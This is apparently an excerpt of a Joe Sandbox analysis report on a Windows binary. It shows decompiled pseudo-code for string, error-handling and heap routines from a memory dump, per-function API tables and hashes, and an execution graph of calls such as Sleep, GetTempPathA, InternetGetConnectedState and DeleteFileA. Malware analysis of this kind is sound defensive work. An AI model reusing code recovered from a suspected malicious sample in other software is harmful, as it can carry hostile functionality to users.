					}
					_v16 = 0;
					_t144 =  *_t141;
					_t81 =  &(_t144[ *(_t144 - 8)]);
					_v24 = _t81;
					__eflags = _t144 - _t81;
					if(_t144 >= _t81) {
						L24:
						return _v16;
					} else {
						while(1) {
							L9:
							_t83 = E00D00BE7(_t144, _a4);
							__eflags = _t83;
							if(_t83 == 0) {
								break;
							}
							_t15 =  &_v16;
							 *_t15 = _v16 + 1;
							__eflags =  *_t15;
							_t144 = _t83 + _v12 * 2;
						}
						_t144 = _t144 + 2 + lstrlenW(_t144) * 2;
						__eflags = _t144 - _v24;
						if(_t144 < _v24) {
							goto L9;
						}
						__eflags = _v16;
						if(_v16 <= 0) {
							goto L24;
						}
						E00C998FD(_t117, _t141, _t139);
						_t145 =  *_t141;
						_t86 =  *((intOrPtr*)(_t145 - 8));
						_t121 = (_v8 - _v12) * _v16 + _t86;
						__eflags =  *((intOrPtr*)(_t145 - 4)) - _t121;
						_v20 = _t86;
						_v36 = _t121;
						if(__eflags < 0) {
							L14:
							_push(_t121);
							_v24 = _t145 - 0xc;
							_t88 = E00C98243(_t141, _t139, _t141, _t145, __eflags);
							__eflags = _t88;
							if(_t88 != 0) {
								__eflags = _v24[2] + _v24[2];
								_t38 = _t121 + 2; // 0x2
								E00C9754F(_t121,  *_t141, _t121 + _t38, _t145, _v24[2] + _v24[2]);
								_t149 = _t149 + 0x10;
								E00C977DA(_v24);
								L17:
								_t146 =  *_t141;
								_t96 =  &(_t146[ *(_t146 - 8)]);
								_v24 = _t96;
								__eflags = _t146 - _t96;
								if(_t146 >= _t96) {
									L23:
									 *((intOrPtr*)( *_t141 - 8)) = _t121;
									goto L24;
								} else {
									goto L18;
								}
								do {
									L18:
									_t142 = E00D00BE7(_t146, _a4);
									__eflags = _t142;
									if(_t142 == 0) {
										goto L21;
									} else {
										goto L19;
									}
									do {
										L19:
										_t140 =  *_v28;
										_t133 = _t142 - _t140 >> 1;
										_t148 =  *((intOrPtr*)(_t140 - 4)) - _t133;
										_t122 = _v20 - _t133 - _v12 + _v20 - _t133 - _v12;
										_v32 = _v8 + _v8 + _t142;
										E00C97090(_t122, _v8 + _v8 + _t142, _t148 - _v8 + _t148 - _v8 + 2, _t142 + _v12 * 2, _t122);
										_t61 = _t148 + 2; // 0x4
										E00C9754F(_t122, _t142, _t148 + _t61, _a8, _v8 + _v8);
										_t146 = _v32;
										 *((short*)(_t122 + _t146)) = 0;
										_v20 = _v20 + _v8 - _v12;
										_t142 = E00D00BE7(_t146, _a4);
										_t149 = _t149 + 0x28;
										__eflags = _t142;
									} while (_t142 != 0);
									_t121 = _v36;
									L21:
									_t146 = _t146 + 2 + lstrlenW(_t146) * 2;
									__eflags = _t146 - _v24;
								} while (_t146 < _v24);
								_t141 = _v28;
								goto L23;
							}
							return _t88 | 0xffffffff;
						}
						__eflags =  *((intOrPtr*)(_t145 - 0xc)) - 1;
						if(__eflags <= 0) {
							goto L17;
						}
						goto L14;
					}
				}
				goto L2;
			}


































                                                                                                                                                                                          0x00cb1602
                                                                                                                                                                                          0x00cb160d
                                                                                                                                                                                          0x00cb160f
                                                                                                                                                                                          0x00cb1615
                                                                                                                                                                                          0x00cb1629
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb1629
                                                                                                                                                                                          0x00cb161a
                                                                                                                                                                                          0x00cb1620
                                                                                                                                                                                          0x00cb1622
                                                                                                                                                                                          0x00cb1627
                                                                                                                                                                                          0x00cb1630
                                                                                                                                                                                          0x00cb1633
                                                                                                                                                                                          0x00cb163f
                                                                                                                                                                                          0x00cb1635
                                                                                                                                                                                          0x00cb1635
                                                                                                                                                                                          0x00cb1635
                                                                                                                                                                                          0x00cb1642
                                                                                                                                                                                          0x00cb1645
                                                                                                                                                                                          0x00cb164a
                                                                                                                                                                                          0x00cb164d
                                                                                                                                                                                          0x00cb1650
                                                                                                                                                                                          0x00cb1652
                                                                                                                                                                                          0x00cb17a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb1658
                                                                                                                                                                                          0x00cb1663
                                                                                                                                                                                          0x00cb1663
                                                                                                                                                                                          0x00cb1667
                                                                                                                                                                                          0x00cb166e
                                                                                                                                                                                          0x00cb1670
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb165d
                                                                                                                                                                                          0x00cb165d
                                                                                                                                                                                          0x00cb165d
                                                                                                                                                                                          0x00cb1660
                                                                                                                                                                                          0x00cb1660
                                                                                                                                                                                          0x00cb1675
                                                                                                                                                                                          0x00cb1679
                                                                                                                                                                                          0x00cb167c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb167e
                                                                                                                                                                                          0x00cb1682
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb168a
                                                                                                                                                                                          0x00cb1695
                                                                                                                                                                                          0x00cb169b
                                                                                                                                                                                          0x00cb169e
                                                                                                                                                                                          0x00cb16a0
                                                                                                                                                                                          0x00cb16a3
                                                                                                                                                                                          0x00cb16a6
                                                                                                                                                                                          0x00cb16a9
                                                                                                                                                                                          0x00cb16b1
                                                                                                                                                                                          0x00cb16b4
                                                                                                                                                                                          0x00cb16b7
                                                                                                                                                                                          0x00cb16ba
                                                                                                                                                                                          0x00cb16bf
                                                                                                                                                                                          0x00cb16c1
                                                                                                                                                                                          0x00cb16d1
                                                                                                                                                                                          0x00cb16d5
                                                                                                                                                                                          0x00cb16dc
                                                                                                                                                                                          0x00cb16e1
                                                                                                                                                                                          0x00cb16e7
                                                                                                                                                                                          0x00cb16ec
                                                                                                                                                                                          0x00cb16ec
                                                                                                                                                                                          0x00cb16f1
                                                                                                                                                                                          0x00cb16f4
                                                                                                                                                                                          0x00cb16f7
                                                                                                                                                                                          0x00cb16f9
                                                                                                                                                                                          0x00cb179f
                                                                                                                                                                                          0x00cb17a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb16ff
                                                                                                                                                                                          0x00cb16ff
                                                                                                                                                                                          0x00cb1708
                                                                                                                                                                                          0x00cb170c
                                                                                                                                                                                          0x00cb170e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb1710
                                                                                                                                                                                          0x00cb1710
                                                                                                                                                                                          0x00cb1713
                                                                                                                                                                                          0x00cb171f
                                                                                                                                                                                          0x00cb1726
                                                                                                                                                                                          0x00cb172b
                                                                                                                                                                                          0x00cb1745
                                                                                                                                                                                          0x00cb1748
                                                                                                                                                                                          0x00cb1756
                                                                                                                                                                                          0x00cb175c
                                                                                                                                                                                          0x00cb1761
                                                                                                                                                                                          0x00cb1769
                                                                                                                                                                                          0x00cb1774
                                                                                                                                                                                          0x00cb177c
                                                                                                                                                                                          0x00cb177e
                                                                                                                                                                                          0x00cb1781
                                                                                                                                                                                          0x00cb1781
                                                                                                                                                                                          0x00cb1785
                                                                                                                                                                                          0x00cb1788
                                                                                                                                                                                          0x00cb178f
                                                                                                                                                                                          0x00cb1793
                                                                                                                                                                                          0x00cb1793
                                                                                                                                                                                          0x00cb179c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb179c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb16c3
                                                                                                                                                                                          0x00cb16ab
                                                                                                                                                                                          0x00cb16af
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb16af
                                                                                                                                                                                          0x00cb1652
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00D3DFE4,00000002), ref: 00CB1620
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00CB163D
                                                                                                                                                                                            • Part of subcall function 00C9754F: _memcpy_s.LIBCMT ref: 00C9755F
                                                                                                                                                                                            • Part of subcall function 00C977DA: InterlockedDecrement.KERNEL32(?), ref: 00C977E8
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 00CB1673
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00CB1789
                                                                                                                                                                                            • Part of subcall function 00C97090: _memmove_s.LIBCMT ref: 00C970A4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$DecrementInterlocked_memcpy_s_memmove_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2991729144-0
                                                                                                                                                                                          • Opcode ID: f1bc65ca9aa5e879be301d4878790a7a1fa16541df2e0340457db27ef33cf5fd
                                                                                                                                                                                          • Instruction ID: 506e6ed18a846a8d8d64733a8b3de4c29857c969b8928559737448a8dce194b5
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1bc65ca9aa5e879be301d4878790a7a1fa16541df2e0340457db27ef33cf5fd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89518736D0021AEFCF11DFA8C9959EEBBB8FF08314F594059E815A7240DB30AE51CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C87FE0 Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00C87FE0(char _a12) {
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t22;
				void* _t32;

				SetLastError(GetLastError());
				_t32 = E00C87E50(_a12);
				if(_t32 == 0) {
					return 5;
				} else {
					_t16 =  *((intOrPtr*)(_t32 + 8));
					if(_t16 != 1) {
						__eflags = _t16 - 2;
						if(__eflags == 0) {
							 *(E00D05D61(__eflags)) =  *(_t32 + 4);
						}
					} else {
						SetLastError( *(_t32 + 4));
					}
					if( *0xd68cd4 != 0) {
						_t22 = E00C881F0( &_a12);
						 *0xd68cd4(_t22, _a12);
					}
					_t17 =  *((intOrPtr*)(_t32 + 8));
					if(_t17 != 1) {
						__eflags = _t17 - 2;
						if(__eflags == 0) {
							 *(E00D05D61(__eflags)) =  *(_t32 + 4);
						}
						return  *((intOrPtr*)(_t32 + 8));
					} else {
						SetLastError( *(_t32 + 4));
						return  *((intOrPtr*)(_t32 + 8));
					}
				}
			}







                                                                                                                                                                                          0x00c87ff0
                                                                                                                                                                                          0x00c88001
                                                                                                                                                                                          0x00c88008
                                                                                                                                                                                          0x00c8807b
                                                                                                                                                                                          0x00c8800a
                                                                                                                                                                                          0x00c8800a
                                                                                                                                                                                          0x00c88010
                                                                                                                                                                                          0x00c8801a
                                                                                                                                                                                          0x00c8801d
                                                                                                                                                                                          0x00c88027
                                                                                                                                                                                          0x00c88027
                                                                                                                                                                                          0x00c88012
                                                                                                                                                                                          0x00c88016
                                                                                                                                                                                          0x00c88016
                                                                                                                                                                                          0x00c88030
                                                                                                                                                                                          0x00c88037
                                                                                                                                                                                          0x00c88042
                                                                                                                                                                                          0x00c88048
                                                                                                                                                                                          0x00c8804b
                                                                                                                                                                                          0x00c88051
                                                                                                                                                                                          0x00c88060
                                                                                                                                                                                          0x00c88063
                                                                                                                                                                                          0x00c8806d
                                                                                                                                                                                          0x00c8806d
                                                                                                                                                                                          0x00c88075
                                                                                                                                                                                          0x00c88053
                                                                                                                                                                                          0x00c88057
                                                                                                                                                                                          0x00c8805f
                                                                                                                                                                                          0x00c8805f
                                                                                                                                                                                          0x00c88051

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00C8816A,00000000,00000000,00D47270,00000000,00000000,00C84DB5,00000000,00000000,00D47270,?,00000000), ref: 00C87FE3
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87FF0
                                                                                                                                                                                            • Part of subcall function 00C87E50: GetLastError.KERNEL32(00000005,00000000,?,761B4C30,00C88001,?,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87E5A
                                                                                                                                                                                            • Part of subcall function 00C87E50: SetLastError.KERNEL32(00000000,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87E74
                                                                                                                                                                                            • Part of subcall function 00C87E50: GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87E85
                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C88016
                                                                                                                                                                                            • Part of subcall function 00D05D61: __getptd_noexit.LIBCMT ref: 00D05D61
                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C88057
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$__getptd_noexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 101986603-0
                                                                                                                                                                                          • Opcode ID: adcfc3a928daec6283cbd5c9e1bd5e13fb3320d993b52b303c9c3c2b4fcf8dbb
                                                                                                                                                                                          • Instruction ID: 00d31c307556138b91f0745b596ae3d2f777c66e4aa8efb2b11bd8b7d23eb068
                                                                                                                                                                                          • Opcode Fuzzy Hash: adcfc3a928daec6283cbd5c9e1bd5e13fb3320d993b52b303c9c3c2b4fcf8dbb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 00117C766007008FC620EBA9E88495BB3E9EB88725B544829F669C7A10CB35EC4DDB75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C89B40 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C89B40() {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t14;

				_t3 =  *0xd68dcc; // 0x988bd8
				if(_t3 == 0) {
					L9:
					return _t3;
				}
				 *(_t3 + 0x5bc) =  *(_t3 + 0x5bc) - 1;
				_t3 = _t3 + 0x5bc;
				if( *_t3 != 0) {
					goto L9;
				}
				if(E00C89880() == 0) {
					_t7 =  *0xd68cd8; // 0x987830
					if(_t7 != 0) {
						HeapFree(GetProcessHeap(), 0, _t7);
						 *0xd68cd8 = 0;
					}
				}
				_t5 =  *0xd68dcc; // 0x988bd8
				_t14 = _t5;
				if(_t5 != 0) {
					E00C89EA0(_t5);
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						_t5 = HeapFree(_t5, 0, _t14);
					}
				}
				return _t5;
			}







                                                                                                                                                                                          0x00c89b40
                                                                                                                                                                                          0x00c89b47
                                                                                                                                                                                          0x00c89bac
                                                                                                                                                                                          0x00c89bac
                                                                                                                                                                                          0x00c89bac
                                                                                                                                                                                          0x00c89b49
                                                                                                                                                                                          0x00c89b4f
                                                                                                                                                                                          0x00c89b57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89b6e
                                                                                                                                                                                          0x00c89b70
                                                                                                                                                                                          0x00c89b77
                                                                                                                                                                                          0x00c89b7f
                                                                                                                                                                                          0x00c89b81
                                                                                                                                                                                          0x00c89b81
                                                                                                                                                                                          0x00c89b77
                                                                                                                                                                                          0x00c89b8b
                                                                                                                                                                                          0x00c89b91
                                                                                                                                                                                          0x00c89b95
                                                                                                                                                                                          0x00c89b98
                                                                                                                                                                                          0x00c89b9d
                                                                                                                                                                                          0x00c89ba1
                                                                                                                                                                                          0x00c89ba7
                                                                                                                                                                                          0x00c89ba7
                                                                                                                                                                                          0x00c89ba1
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C89880: GetProcessHeap.KERNEL32(8A9E1774), ref: 00C898A9
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00987830), ref: 00C89B7C
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00C89B7F
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00988BD8), ref: 00C89B9D
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00988BD8), ref: 00C89BA7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3168794593-0
                                                                                                                                                                                          • Opcode ID: 8491c2102d089fd0a2b44e4aae6f2eb1485f3f5647da433a4f55daeaea3d1d72
                                                                                                                                                                                          • Instruction ID: 9db674d250555ff3a268f151aca98305b9ef41781e0e0529109f3dceccdfb091
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8491c2102d089fd0a2b44e4aae6f2eb1485f3f5647da433a4f55daeaea3d1d72
                                                                                                                                                                                          • Instruction Fuzzy Hash: DDF0F9716013115FEA207B6AEC84F3766ECEB95799F080026E500E7291DBB5D900ABB8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:7.3%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0.3%
                                                                                                                                                                                          Total number of Nodes:1094
                                                                                                                                                                                          Total number of Limit Nodes:44
                                                                                                                                                                                          execution_graph 46515 402d70 46516 402d86 46515->46516 46517 402de8 CreateFileA 46516->46517 46518 402e9a GetStdHandle 46516->46518 46529 402d8c 46516->46529 46519 402e06 46517->46519 46520 402f0e GetLastError 46517->46520 46518->46520 46523 402ed5 46518->46523 46522 402e14 GetFileSize 46519->46522 46519->46523 46520->46529 46522->46520 46524 402e28 46522->46524 46525 402edf GetFileType 46523->46525 46523->46529 46526 402e31 SetFilePointer 46524->46526 46527 402e2f 46524->46527 46528 402efa CloseHandle 46525->46528 46525->46529 46526->46520 46530 402e44 ReadFile 46526->46530 46527->46526 46528->46529 46530->46520 46531 402e66 46530->46531 46531->46523 46532 402e79 SetFilePointer 46531->46532 46532->46520 46533 402e8e SetEndOfFile 46532->46533 46533->46520 46534 402e98 46533->46534 46534->46523 46535 402cc2 ReadFile 46536 402ceb GetLastError 46535->46536 46537 402cf5 46535->46537 46536->46537 46538 437d70 SetWindowLongA GetWindowLongA 46539 437daf GetWindowLongA 46538->46539 46540 437dcd SetPropA SetPropA 46538->46540 46539->46540 46541 437dbe SetWindowLongA 46539->46541 46544 422ba4 46540->46544 46541->46540 46550 498248 46544->46550 46553 43f118 46544->46553 46569 43eec0 46544->46569 46576 459934 46544->46576 46545 422bba 46660 441704 46550->46660 46552 498253 CreateThread 46552->46545 46662 497cf0 46552->46662 46554 43f143 46553->46554 46555 43f12b 46553->46555 46563 43f13e 46554->46563 46904 43f084 58 API calls 46554->46904 46556 43f19d 46555->46556 46560 43f12d 46555->46560 46557 43c1fc 152 API calls 46556->46557 46565 43f1a6 46557->46565 46560->46563 46564 43f23a GetCapture 46560->46564 46561 43f1f7 46562 43f1fb 46561->46562 46561->46563 46567 43f1da 46562->46567 46568 43f21e NtdllDefWindowProc_A 46562->46568 46563->46567 46893 43c1fc 46563->46893 46564->46563 46565->46567 46903 43eff0 57 API calls 46565->46903 46567->46545 46568->46567 46575 43f118 155 API calls 46569->46575 46570 43eeef 46980 4399a4 89 API calls 46570->46980 46572 43ef01 46981 428b50 91 API calls 46572->46981 46574 43ef06 46574->46545 46575->46570 46577 45999c 46576->46577 46581 45996a 46576->46581 46982 4597e8 46577->46982 46580 4599a7 46582 459a65 46580->46582 46583 4599b7 46580->46583 46581->46577 46605 45998b 46581->46605 46990 41ac6c 56 API calls 46581->46990 46584 459a6c 46582->46584 46585 459abb 46582->46585 46586 459f03 46583->46586 46587 4599bd 46583->46587 46589 459a72 46584->46589 46621 459ddb 46584->46621 46592 459f1d 46585->46592 46593 459ac8 46585->46593 46606 459a49 46585->46606 47007 45aae4 21 API calls 46586->47007 46590 459a31 46587->46590 46591 459a4e 46587->46591 46587->46605 46587->46606 46595 459aa2 46589->46595 46596 459a79 46589->46596 46597 459fa7 46590->46597 46598 459a37 46590->46598 46599 459a57 46591->46599 46600 459b93 46591->46600 46601 459f26 46592->46601 46602 459f3e 46592->46602 46603 459ec4 IsIconic 46593->46603 46604 459ad3 46593->46604 46594 459d58 46594->46605 46595->46605 46595->46606 46617 459db9 46595->46617 46596->46605 46614 459a86 46596->46614 46615 459afd 46596->46615 47025 4598ac NtdllDefWindowProc_A 46597->47025 46608 459f81 46598->46608 46609 459a40 46598->46609 46599->46606 46610 459ce4 46599->46610 46994 45a038 46600->46994 47008 45a5a4 26 API calls 46601->47008 47009 45a600 57 API calls 46602->47009 46603->46605 46607 459ed8 GetFocus 46603->46607 46604->46586 46604->46606 46605->46545 46606->46605 46989 4598ac NtdllDefWindowProc_A 46606->46989 46607->46605 46618 459ee9 46607->46618 47010 445ed0 46608->47010 46609->46606 46619 459bc7 46609->46619 46610->46605 46638 459d12 46610->46638 46614->46606 46622 459c9c SendMessageA 46614->46622 46624 459b0f 46615->46624 46625 459b18 46615->46625 47003 45a47c IsWindowEnabled 46617->47003 47006 451750 GetCurrentThreadId 73CCAC10 46618->47006 46999 4598ac NtdllDefWindowProc_A 46619->46999 46621->46605 46636 459e01 IsWindowEnabled 46621->46636 46622->46605 46629 459b25 46624->46629 46630 459b16 46624->46630 46991 45a054 70 API calls 46625->46991 46628 459f93 47023 459840 20 API calls 46628->47023 46992 45a104 67 API calls 46629->46992 46993 4598ac NtdllDefWindowProc_A 46630->46993 46634 459ef0 46634->46605 46639 459ef8 SetFocus 46634->46639 46635 459bcd 46641 459c0c 46635->46641 46642 459bea 46635->46642 46636->46605 46643 459e0f 46636->46643 47002 40edc4 SetErrorMode LoadLibraryA 46638->47002 46639->46605 47001 45973c 62 API calls 46641->47001 47000 45974c 57 API calls 46642->47000 46652 459e16 IsWindowVisible 46643->46652 46644 459f9e 47024 4598ac NtdllDefWindowProc_A 46644->47024 46649 459d21 46653 459d70 GetLastError 46649->46653 46654 459d30 GetProcAddress 46649->46654 46650 459bf2 PostMessageA 46650->46605 46651 459c14 PostMessageA 46651->46605 46652->46605 46655 459e24 GetFocus 46652->46655 46653->46605 46654->46594 46654->46605 46656 441704 46655->46656 46657 459e39 SetFocus 46656->46657 47004 43c130 46657->47004 46661 44170e 46660->46661 46661->46552 46663 497cf8 46662->46663 46663->46663 46664 497cff Sleep 46663->46664 46743 4737b0 GetTempPathA 46664->46743 46666 497d22 46745 472d44 46666->46745 46670 497d4c 46671 4737b0 GetTempPathA 46670->46671 46672 497d54 46671->46672 46673 472d44 27 API calls 46672->46673 46674 497d69 46673->46674 46675 404d40 25 API calls 46674->46675 46676 497d7e 46675->46676 46677 474d34 InternetGetConnectedState 46676->46677 46687 497d87 46677->46687 46678 4049e4 20 API calls 46679 498135 46678->46679 46680 4049c0 20 API calls 46679->46680 46681 49813d 46680->46681 46683 4049e4 20 API calls 46681->46683 46682 404a58 20 API calls 46682->46687 46685 49814a 46683->46685 46684 4967d4 20 API calls 46684->46687 46686 474d50 45 API calls 46686->46687 46687->46682 46687->46684 46687->46686 46688 497e02 46687->46688 46698 497f63 46687->46698 46723 4980dc 46687->46723 46689 430158 25 API calls 46688->46689 46690 497e11 46689->46690 46691 4758e8 25 API calls 46690->46691 46692 497e3a 46691->46692 46693 404a14 25 API calls 46692->46693 46694 497e47 46693->46694 46697 4758e8 25 API calls 46694->46697 46695 404a58 20 API calls 46695->46698 46696 4967d4 20 API calls 46696->46698 46699 497e6e 46697->46699 46698->46695 46698->46696 46700 474d50 45 API calls 46698->46700 46703 49801a 46698->46703 46698->46723 46701 404a14 25 API calls 46699->46701 46700->46698 46702 497e7b 46701->46702 46705 4758e8 25 API calls 46702->46705 46704 49a3e0 416 API calls 46703->46704 46706 498026 46704->46706 46707 497ea2 46705->46707 46711 472ef0 25 API calls 46706->46711 46709 404a14 25 API calls 46707->46709 46710 497eaf 46709->46710 46713 4758e8 25 API calls 46710->46713 46712 498058 46711->46712 46714 498067 46712->46714 46715 4980b6 46712->46715 46716 497ed6 46713->46716 46717 473490 23 API calls 46714->46717 46719 473490 23 API calls 46715->46719 46718 404a14 25 API calls 46716->46718 46721 49807c 46717->46721 46722 497ee3 46718->46722 46720 4980cc 46719->46720 46720->46723 46726 45a800 PostQuitMessage 46720->46726 46724 49808e 46721->46724 46725 498080 46721->46725 46731 4758e8 25 API calls 46722->46731 46723->46678 46728 473490 23 API calls 46724->46728 46727 45a800 PostQuitMessage 46725->46727 46726->46723 46729 49808c 46727->46729 46730 4980a4 46728->46730 46729->46723 46730->46723 46733 45a800 PostQuitMessage 46730->46733 46732 497f0a 46731->46732 46734 404a14 25 API calls 46732->46734 46733->46729 46735 497f17 46734->46735 46736 409628 56 API calls 46735->46736 46737 497f21 46736->46737 46738 409628 56 API calls 46737->46738 46739 497f37 46738->46739 46740 4967d4 20 API calls 46739->46740 46741 497f3f 46739->46741 46740->46741 46742 409bac DeleteFileA 46741->46742 46742->46698 46744 4737cd 46743->46744 46744->46666 46766 402bc8 QueryPerformanceCounter 46745->46766 46747 472d64 46769 404a58 46747->46769 46752 472d78 46754 472da8 46752->46754 46777 404ba8 46752->46777 46780 404c88 